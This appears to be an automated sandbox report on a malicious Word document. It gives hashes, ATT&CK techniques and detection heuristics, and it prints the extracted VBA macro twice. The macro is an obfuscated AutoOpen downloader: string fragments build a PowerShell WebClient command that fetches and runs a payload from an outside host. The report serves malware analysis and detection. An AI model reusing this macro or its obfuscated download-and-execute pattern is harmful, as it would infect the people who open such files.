Office (OLE) malware analysis — malicious · 8ff51b8a6823376d

MALICIOUS

Office (OLE)

130.0 KB Created: 2018-02-12 19:51:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: b64546e52401a78e316c07cf2288959d SHA-1: 35715d03be573c6ff9d8b9e1a79a1adfbc80c984 SHA-256: 8ff51b8a6823376dc08b13467f0382782f77b77f0a8d1fd27bee2a6d854dcdd4

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a second-stage payload. The script attempts to download and execute a payload from a reconstructed URL: "http://www.sbktrcUI+cUIavDFbOzait/k1uT4pcUI+cUI+T4p+T4pr6drtw/?hT4p+T4ptp:T4pr//www.sbktrcUI+cUIavDFbOzait". This indicates a downloader or droppers functionality.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6447097-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6447097-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26355 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	26355 bytes
SHA-256: `0c2427f433d73556394670372e7fdd9b24758fa3384cfb6e0260e8a40182cb5b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NJKUjoDzJQwwOs" Sub AutoOpen() On Error Resume Next nZaJBERkf = CkoaL - Sgn(jiYYGflkwiIub) - (8007116 - Tan(1728946) / 4434221 - ChrW(GuIbSC)) fwUUaVVEj = tEWC - Sgn(zHnpKS) - (9216754 - Tan(4518324) / 1674671 - ChrW(CfWhjCSObsal)) LLPddYmil = UAHmUmHjjaL - Sgn(YpwWDEbpuJ) - (7398025 - Tan(2601639) / 9415407 - ChrW(ZhpXkaEPK)) Application.Run "ufjYiBZtoGam", slAjShvwAXAvVM WathjGsIz = jnaiGViHv - Sgn(LNtpsMZuMqlaI) - (5999848 - Tan(5417748) / 9239826 - ChrW(XujBB)) mnQpzCiBC = IWzIhEp - Sgn(jwvJoGi) - (9040413 - Tan(521078) / 2103183 - ChrW(KMMqJ)) bGZDMXMLn = RmfTOFi - Sgn(CDFdwKKEz) - (4459526 - Tan(7876711) / 8404149 - ChrW(vfph)) End Sub Function slAjShvwAXAvVM() On Error Resume Next avVWqlonuwd = WzqwVjRpqLzYIH - Sgn(vVNtYp) - (3574981 - Tan(4382237) / 458031 - ChrW(QQFaIwS)) rpjfGonm = QjtFhoRAS - Sgn(DPTHHd) - (636942 - Tan(5572790) / 111649 - ChrW(pJDaodFQMOhOhz)) pawpijjLa = aXpnYbXXDSmzI - Sgn(cWfwS) - (7155857 - Tan(1244409) / 5658231 - ChrW(RDjBoDh)) OEiEKqv = qviJwRH + Mid(PPsP + "RshmAtr+0hrcUI+cUItes0hr+0hrt0hr+0hr.magnums'+'pcUI+cUIort.c'+'o0hr+0hrm/k1uT4pcUI+cUI+T4p0hr+0hT4p+T4pr60hr+0hrd0hr+0hrt0hr+0hrw0hr+0hr/?'+'hT4p+T4pt0hr+0hrtp:0hr+0hT4p+T4pr//'+'www.sbktrcUI+cUIavDFbOzait" + twwNsO, 7, 191) hFKMIbafo = jTWcEdscW - Sgn(qUuTU) - (5687866 - Tan(2015559) / 2999317 - ChrW(ntELfYTJi)) kOBMrjrSvw = ApFnwiSdizA - Sgn(fNi) - (2135071 - Tan(9530870) / 3920305 - ChrW(RTuIJBjfIrElU)) jmEawmkz = sWUljw - Sgn(BAfSZjNqcUa) - (9744276 - Tan(3139112) / 2427335 - ChrW(FjvlRC)) lFqnab = iVPjFNpcYRmzH + Mid(dwH + "uJFmUScliPswwuNYne0hr+0hrxt0hr+0T4p+T4phr(100000hT4p+T4pr+0hr, T4p+T4p2820hr+0hr130hr+0hr30hr+0hr);A9TADCX0hr+0hr = 0hr+0hrO0hr+0hrvGT4p+T4p0hr+0hr'+' 0hr+0hrhttp0hrT'+'4'+'p+T4p+0hr:0hr+0hr//0hZP" + rBRPMlzFYjo, 17, 178) DkiQr = bRn - Sgn(viirNFGutaAO) - (8950663 - Tan(1889371) / 5159441 - ChrW(wzqp)) LtoJkA = TzOdP - Sgn(YbnLZakVsZXFJ) - (6835245 - Tan(8064443) / 4802010 - ChrW(oRcULvFiazicf)) cKBHhjt = OwJhSGO - Sgn(nKohjYrjG) - (4156348 - Tan(8867136) / 1357839 - ChrW(LnaMjijwc)) YTJjNhzmmG = maLfpnqO + Mid(QXHPTPqj + "hSTMSJpdDmlphr+0hr = 0hr+0hr&(OvGnOvG0hr+0hr+0hr+0'+'hrOvGeO0hT4p+cUI+cUIT4pDDaZZwdBuzZqrJGjFKWpcY" + SojWimE, 14, 63) XMWGVVkKpG = mXhbKEv - Sgn(dOkjEwb) - (5740641 - Tan(2368701) / 6397899 - ChrW(uiUBtElz)) UtwjFzAzQBw = oMHwR - Sgn(luvmTNlJiR) - (452463 - Tan(2748228) / 7479078 - ChrW(GuhVo)) iVUEMIZb = mRVoXZHjjRHo - Sgn(YMjiZN) - (1685810 - Tan(1875412) / 4937297 - ChrW(krpwmEtfmHd)) idacd = tNFJHzB + Mid(SdOiRjiM + "KlUNwpk4p+T4p(0hr+0hrAT4p+T4p90hr+0cUI+cUIhrT0hrT4p+T4p+0hracUI+cUI0hr+cUI+cUI0hrs'+'fc.0hr+0hrd0hr+0hrQuTocUI+cUIStr0h'+'r+0hrl0hr+0hrGn0hr'+'+0hrilGnNgdQu()0hr+0hr,0hr+0hr T4p+T4pA0wmvEAGFhRiosVDrMGinT" + nurIiYtCKi, 8, 176) nFjKRV = bKTD - Sgn(wVadq) - (6833425 - Tan(7833374) / 5765050 - ChrW(XibwhonKiS)) qQtjX = VpdpjMkFTkz - Sgn(dVPJKSqrfBGO) - (8055709 - Tan(1148109) / 7567496 - ChrW(ETQbARnHslwdwj)) iZTFCWWzwl = waqzd - Sgn(icrraFT) - (6819191 - Tan(2869523) / 9872008 - ChrW(ZoAzUVnLi)) vAZBfEQbI = TZHPuFBcQKNzOw + Mid(MHHjiMflw + "diNpwrSAYt0hcUI+cUIrv0hr+0T4p+T4phrG-ob0hrT4p+T4'+'p+0hrcUI+cUIjT4p+T4pectO0hr+0hrvG0hr+0hr) System0hr+0hr.NetcUI+cUIT4p+T4pcUI+cUI'+'.'+'WebCl0hr+0hrie0T4p+T4phr'+'+cUI'+'+cUI0hrnt;A0hr+0zUYpMXdiNzFfKRUpFXooKIkLib" + bUfnmUhmds, 11, 178) htnZHlstTw = uKMDVfhJdZa - Sgn(SPKaJvlOwPkonA) - (1596405 - Tan(6653524) / 2556958 - ChrW(ijwVPTNnDF)) fbiPDIL = DqwClCoAIBjTo - Sgn(faXPUWzvzrrD) - (9491204 - Tan(9987032) / 8210165 - ChrW(VrjVv)) POYVc = lmBzTiEd - Sgn(PIh) - (6933333 - Tan(8780032) / 8037410 - ChrW(iitHsHLi)) mzwvBdVZSb = RZWMtwqK + Mid(zIKdaqYkZMTX + "ESpTLMozBhTstmWRhrT4p+T4pqVT4p+T4pU0hr,[ChAR]92 -cREPlacE 0h'+'rdQu'+'0hr,[cUI+cUIChAR]34 -cREPlacE 0hrlGn0hcUI+cUIrT4p+T4'+'p,[T4p+T4pChAR]96 - ... (truncated)

SHA-256: 0c2427f433d73556394670372e7fdd9b24758fa3384cfb6e0260e8a40182cb5b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NJKUjoDzJQwwOs"
Sub AutoOpen()
On Error Resume Next
nZaJBERkf = CkoaL - Sgn(jiYYGflkwiIub) - (8007116 - Tan(1728946) / 4434221 - ChrW(GuIbSC))
fwUUaVVEj = tEWC - Sgn(zHnpKS) - (9216754 - Tan(4518324) / 1674671 - ChrW(CfWhjCSObsal))
LLPddYmil = UAHmUmHjjaL - Sgn(YpwWDEbpuJ) - (7398025 - Tan(2601639) / 9415407 - ChrW(ZhpXkaEPK))
Application.Run "ufjYiBZtoGam", slAjShvwAXAvVM
WathjGsIz = jnaiGViHv - Sgn(LNtpsMZuMqlaI) - (5999848 - Tan(5417748) / 9239826 - ChrW(XujBB))
mnQpzCiBC = IWzIhEp - Sgn(jwvJoGi) - (9040413 - Tan(521078) / 2103183 - ChrW(KMMqJ))
bGZDMXMLn = RmfTOFi - Sgn(CDFdwKKEz) - (4459526 - Tan(7876711) / 8404149 - ChrW(vfph))
End Sub
Function slAjShvwAXAvVM()
On Error Resume Next
avVWqlonuwd = WzqwVjRpqLzYIH - Sgn(vVNtYp) - (3574981 - Tan(4382237) / 458031 - ChrW(QQFaIwS))
rpjfGonm = QjtFhoRAS - Sgn(DPTHHd) - (636942 - Tan(5572790) / 111649 - ChrW(pJDaodFQMOhOhz))
pawpijjLa = aXpnYbXXDSmzI - Sgn(cWfwS) - (7155857 - Tan(1244409) / 5658231 - ChrW(RDjBoDh))
OEiEKqv = qviJwRH + Mid(PPsP + "RshmAtr+0hrcUI+cUItes0hr+0hrt0hr+0hr.magnums'+'pcUI+cUIort.c'+'o0hr+0hrm/k1uT4pcUI+cUI+T4p0hr+0hT4p+T4pr60hr+0hrd0hr+0hrt0hr+0hrw0hr+0hr/?'+'hT4p+T4pt0hr+0hrtp:0hr+0hT4p+T4pr//'+'www.sbktrcUI+cUIavDFbOzait" + twwNsO, 7, 191)
hFKMIbafo = jTWcEdscW - Sgn(qUuTU) - (5687866 - Tan(2015559) / 2999317 - ChrW(ntELfYTJi))
kOBMrjrSvw = ApFnwiSdizA - Sgn(fNi) - (2135071 - Tan(9530870) / 3920305 - ChrW(RTuIJBjfIrElU))
jmEawmkz = sWUljw - Sgn(BAfSZjNqcUa) - (9744276 - Tan(3139112) / 2427335 - ChrW(FjvlRC))
lFqnab = iVPjFNpcYRmzH + Mid(dwH + "uJFmUScliPswwuNYne0hr+0hrxt0hr+0T4p+T4phr(100000hT4p+T4pr+0hr, T4p+T4p2820hr+0hr130hr+0hr30hr+0hr);A9TADCX0hr+0hr = 0hr+0hrO0hr+0hrvGT4p+T4p0hr+0hr'+' 0hr+0hrhttp0hrT'+'4'+'p+T4p+0hr:0hr+0hr//0hZP" + rBRPMlzFYjo, 17, 178)
DkiQr = bRn - Sgn(viirNFGutaAO) - (8950663 - Tan(1889371) / 5159441 - ChrW(wzqp))
LtoJkA = TzOdP - Sgn(YbnLZakVsZXFJ) - (6835245 - Tan(8064443) / 4802010 - ChrW(oRcULvFiazicf))
cKBHhjt = OwJhSGO - Sgn(nKohjYrjG) - (4156348 - Tan(8867136) / 1357839 - ChrW(LnaMjijwc))
YTJjNhzmmG = maLfpnqO + Mid(QXHPTPqj + "hSTMSJpdDmlphr+0hr = 0hr+0hr&(OvGnOvG0hr+0hr+0hr+0'+'hrOvGeO0hT4p+cUI+cUIT4pDDaZZwdBuzZqrJGjFKWpcY" + SojWimE, 14, 63)
XMWGVVkKpG = mXhbKEv - Sgn(dOkjEwb) - (5740641 - Tan(2368701) / 6397899 - ChrW(uiUBtElz))
UtwjFzAzQBw = oMHwR - Sgn(luvmTNlJiR) - (452463 - Tan(2748228) / 7479078 - ChrW(GuhVo))
iVUEMIZb = mRVoXZHjjRHo - Sgn(YMjiZN) - (1685810 - Tan(1875412) / 4937297 - ChrW(krpwmEtfmHd))
idacd = tNFJHzB + Mid(SdOiRjiM + "KlUNwpk4p+T4p(0hr+0hrAT4p+T4p90hr+0cUI+cUIhrT0hrT4p+T4p+0hracUI+cUI0hr+cUI+cUI0hrs'+'fc.0hr+0hrd0hr+0hrQuTocUI+cUIStr0h'+'r+0hrl0hr+0hrGn0hr'+'+0hrilGnNgdQu()0hr+0hr,0hr+0hr T4p+T4pA0wmvEAGFhRiosVDrMGinT" + nurIiYtCKi, 8, 176)
nFjKRV = bKTD - Sgn(wVadq) - (6833425 - Tan(7833374) / 5765050 - ChrW(XibwhonKiS))
qQtjX = VpdpjMkFTkz - Sgn(dVPJKSqrfBGO) - (8055709 - Tan(1148109) / 7567496 - ChrW(ETQbARnHslwdwj))
iZTFCWWzwl = waqzd - Sgn(icrraFT) - (6819191 - Tan(2869523) / 9872008 - ChrW(ZoAzUVnLi))
vAZBfEQbI = TZHPuFBcQKNzOw + Mid(MHHjiMflw + "diNpwrSAYt0hcUI+cUIrv0hr+0T4p+T4phrG-ob0hrT4p+T4'+'p+0hrcUI+cUIjT4p+T4pectO0hr+0hrvG0hr+0hr) System0hr+0hr.NetcUI+cUIT4p+T4pcUI+cUI'+'.'+'WebCl0hr+0hrie0T4p+T4phr'+'+cUI'+'+cUI0hrnt;A0hr+0zUYpMXdiNzFfKRUpFXooKIkLib" + bUfnmUhmds, 11, 178)
htnZHlstTw = uKMDVfhJdZa - Sgn(SPKaJvlOwPkonA) - (1596405 - Tan(6653524) / 2556958 - ChrW(ijwVPTNnDF))
fbiPDIL = DqwClCoAIBjTo - Sgn(faXPUWzvzrrD) - (9491204 - Tan(9987032) / 8210165 - ChrW(VrjVv))
POYVc = lmBzTiEd - Sgn(PIh) - (6933333 - Tan(8780032) / 8037410 - ChrW(iitHsHLi))
mzwvBdVZSb = RZWMtwqK + Mid(zIKdaqYkZMTX + "ESpTLMozBhTstmWRhrT4p+T4pqVT4p+T4pU0hr,[ChAR]92 -cREPlacE  0h'+'rdQu'+'0hr,[cUI+cUIChAR]34 -cREPlacE 0hrlGn0hcUI+cUIrT4p+T4'+'p,[T4p+T4pChAR]96  -
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.